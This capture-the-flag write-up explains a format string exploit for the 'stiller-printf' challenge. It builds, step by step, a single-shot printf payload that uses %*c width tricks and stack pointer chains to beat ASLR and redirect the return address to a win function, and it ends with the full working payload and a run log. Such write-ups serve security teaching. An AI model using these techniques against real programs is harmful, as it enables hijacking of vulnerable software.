writeup 2023/lit/stiller-printf

Format string is easy right?

We’ll be covering some important format string techniques through the stiller-printf challenge. It’s assumed that you know the technique (leakless pointer chains) from my still-printf writeup already. This is the giant I’m standing on the shoulders of: stiller-printf by eth007. Here’s the challenge source:

// includes

void win() {
	// ...
}

int main() {
    char buf[0x100];
    setbuf(stdout, NULL);
    fgets(buf, sizeof(buf), stdin);
    printf(buf);
    exit(1);
}

with mitigations:

RELRO:      Full RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        PIE enabledx

Importantly, we don’t directly interact with the binary but with a wrapper written in python which introduces the following restrictions:

We can only send one payload
That payload needs to have a >1/3 chance of working

Our plan here will be similar to still-printf. We will be using pointer chains on the stack to overwrite the return address of printf to the address of win. The buffer is 0x100 so that part should be fairly easy, the main issue we encounter is how to bypass the ASLR penalty we incur by blindly overwriting two LSByte of the stack pointers.

Looking at the stack dump right before the printf call we have a few chains to pick from: alt alt including 40 -> 70; 43 -> 73; 44 -> 73; 47 -> 75. The printf return address is: 0x7fffffffe128 —▸ 0x5555555552e7 (main+82) and the win function: 0x555555555209.

As there are no pointers on the stack that end with ..e1XX we will have to overwrite the two LSBytes of a stack pointer no matter which chain we choose. We only have to overwrite the LSByte of the return function (0x5555555552e7 -> 0x555555555209) though.

The trick to beating ASLR is using the %*c construct. We will do %*c on a stack pointer, here we can choose index 40 i.e. 0x7fffffffe240 —▸ 0x7fffffffe330. That will print out 0xffffe330 characters (the lower four bytes) adjusting the %n-counter accordingly. That is an ASLR value which is at a constant offset from the return address location (0x7fffffffe138), we get to it with simple modular arithmetic. Note that this trick only works because our output is piped to /dev/null in the wrapper script, otherwise the printing would take too long.

To make debugging easier we add these two lines to our gdbinit after libc is loaded:

gdbinit = '''
break main
brva 0x0012E2
continue
continue
call (int)close(1)
call (int)open("/dev/null", 1)
'''.format(**locals())

which will replace stdout with /dev/null. Note that if we only had one continue i.e. ran the calls at the start of main, the values on the stack would be greatly affected. Take care that the stack is the same as before when adding calls like this! Alternatively we could simply debug the program manually and run it with run >/dev/null

Note that the syntax for using %*c with positional arguments is weird:

printf("%*3$c", 'D', 'A', 10, 'B', 15, 'C');
// output: "         D"
// len("         D") == 10

printf("%4$*c", 16, 'A', 10, 'B', 15, 'C');
// output: "               B"
// len("               B") == 16

printf("%4$*3$c", 'D', 'A', 10, 'B', 15, 'C');
// output: "         B"
// len("         B") == 10
// Note that "%*3$4$c" doesn't work (isn't a valid format string)

For some reason, only 0x1cd0 characters are printed when ASLR is turned off, but when it’s turned on everything works as expected.

Anyways, we can’t use positional %*c yet due to printf internal caching. Making a pointer for the return address looks like this:

payload = '%c'*39 + '%*c' + '%64977c' + '%hn'
#           ^39      ^40,41    ^42       ^43
# (0xe128 - 39 - 0xffffe330) % 0x10000 = 64977
#   ^ the location of the return address on the stack
#                  ^ the value at argument 40

We are using the 40 -> 70 chain for bypassing ASLR and 43 -> 73 for the actual overwrite. It executes successfully: alt Although the numbers are different since for some reason the exploit only works under ASLR, we can see that we have a pointer to the return address now. Now, while the logic is completely sound, the proper value seems to be written only ~1/2-1/3 of the time. It is unclear to me why that is.

Supposedly overwriting the return address would give us the full exploit:

payload = '%c'*39 + '%*c' + '%64977c' + '%hn' + '%225c' + '%73$hhn'
# (0x9 - 0xe128) % 0x100 = 225
#   ^ the LSByte of the win function
#          ^ (the amount of bytes we printed up to now) == (the amount we just wrote)
# len(payload) == 103

However this doesn’t actually work (it works ~1/32 times, which isn’t good enough for us). Let’s look at the locations of return addresses of a few runs with ASLR:

0x7ffdab7eb068
0x7ffe7cf15e88
0x7ffdfdefce98
0x7ffeea47c9e8
0x7ffefde66048

While the last nibble is consistent, the last byte as a whole is not (stack ASLR is like that). So our calculation (0x9 - 0xe128) % 0x100 = 225 is only correct if the second to last nibble is 2, which is true only 1/16 times. The second LSByte is completely random but doesn’t matter due to % 0x100. The win function address is an executable PIE address, not a stack address, it’s not at a constant offset from our stack pointers.

Essentially our problem boils down to the fact that we don’t know how many bytes we printed modulo 0x100. There’s a solution to this though! Suppose we run %*c on the value at offset 40 a total of 256 times. In the payload that would look something like "%*40$c"*256. In total, the amount of bytes printed modulo 0x100 would be: 0xffffe330 * 256 (mod 0x100) = 0x30 * 256 (mod 0x100) = 0x30 * 0x100 (mod 100) = 0x3000 (mod 0x100) = 0x0. So after running %*c once on the value at 40 for the stack pointer overwrite, we can run it 255=0xff more times ("%*40$c"*255) and then we would know exactly how many bytes we printed! In our case it would be 39 + 0xffffe330 + 64977 + 0xffffe330*0xff (mod 0x100) = 39 + 64977 (mod 0x100) = 0xf8.

A problem we immediately encounter is that "%*40$c"*0xff doesn’t fit into our payload which needs to be less than 0x100. Luckily we can take advantage of the fact that the last nibble in our stack pointer is predictable (it’s either going to be 0x0 or 0x8 due to stack alignment, and in our case it’s always going to be 0x0). So instead of multiplying by 0x100 we can multiply by 0x10 and we will know that 0xffffe330 * 0x10 (mod 0x100) = 0xffffe33000 (mod 0x100) = 0x0 and the full calculation is still pretty much the same: 39 + 0xffffe330 + 64977 + 0xffffe330*0xf (mod 0x100) = 39 + 64977 (mod 0x100) = 0xf8.

Okay, after all that our payload looks like this:

payload='%c'*39+'%*c'+'%64977c'+'%hn'+'%*40$c'*15+'%17c'+'%73$hhn'
# (0x9 - 0xf8) % 0x100 = 17

Aaaand it doesn’t work! The reason supposedly being that by printing too much, we have overflown the done (%n) variable (called written in newer glibc). The overflow logic can be seen here (here in newer glibc). So we can use addresses (which are > 32-bit values) as width modifiers as only their lower 32-bits will be taken into account when printing, but doing so enough times will eventually overflow the 32-bit done/written/%n variable resulting in printf simply exiting early.

The workaround is as follows. We will first use modular arithmetic to write only the last byte of our offset 40 value somewhere on the stack. Then we will run "%*c" 15 times on that value. This will do the same thing as before, ensuring we know how many bytes we’ve written modulo 0x100 while not overflowing the stack.

We need to perform the write where the value is already small (so pointers are off the table), this pointer chain will work: alt For the same reasons as before, we can’t use positional arguments for the write (we need the value, if we use positionals the old value (1) will be cached).

This payload just performs the write we covered, doesn’t overwrite the return address:

payload='%c'*39+'%*c'+'%64977c'+'%hn'+'%c'*21+'%243c'+'%hhn'
#         ^39    ^40,41  ^42      ^43  ^44-64   ^65     ^66
# (-(64977 + 39 + 21)) % 0x100 = 243

# ^ because our current sum is: (39 + x + 64977 + 21), so:
# (39 + x + 64977 + 21 + 243) % 0x100 = 
# (39 + x + 64977 + 21 - (64977 + 39 + 21)) % 0x100 =
# x % 0x100

And as we can see it worked: alt alt We successfully copied the last byte from the 40th argument to the 72nd. As a reminder, we did this because now (0x2d815be0 + 0xe0*15) % 0x100 = (0xe0 + 0xe0 * 15) % 0x100 = (0xe0 * 0x10) % 0x100 = 0xe00 % 0x100 = 0x0 and that will be true whatever the last byte is (provided the last nibble is 0, which it will be in this challenge).

The final payload is:

payload = '%c'*39 + '%*c' + '%64977c' + '%hn'
# point stack pointer towards return address (43 -> 73)
payload += '%c'*21 + '%243c' + '%hhn'
# write last byte of 40th argument to argument 72 (66 -> 72)  
payload += '%*72$c'*15 
# (x + x*15) % 0x100 = 0x0
payload += '%9c' + '%73$hhn'
# write 0x9 to the LSByte of the printf return address
# making it point to win

# len(payload) == 242

And we win.

~> python app.py
Payload: %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%*c%64977c%hn%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%243c%hhn%*72$c%*72$c%*72$c%*72$c%*72$c%*72$c%*72$c%*72$c%*72$c%*72$c%*72$c%*72$c%*72$c%*72$c%*72$c%9c%73$hhn
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 150/150 [12:15<00:00,  4.90s/it]
Total: 150 Passed: 60
CONSISTENT ENOUGH FOR ME :D
LITCTF{FLAG}

With a 40% winrate B).

If you want to check out other interesting/similar format string challenges take a look at 2020/tfc/simple_echoserver, 2021/pbjar/wallstreet23 and 2024/idek/writeme.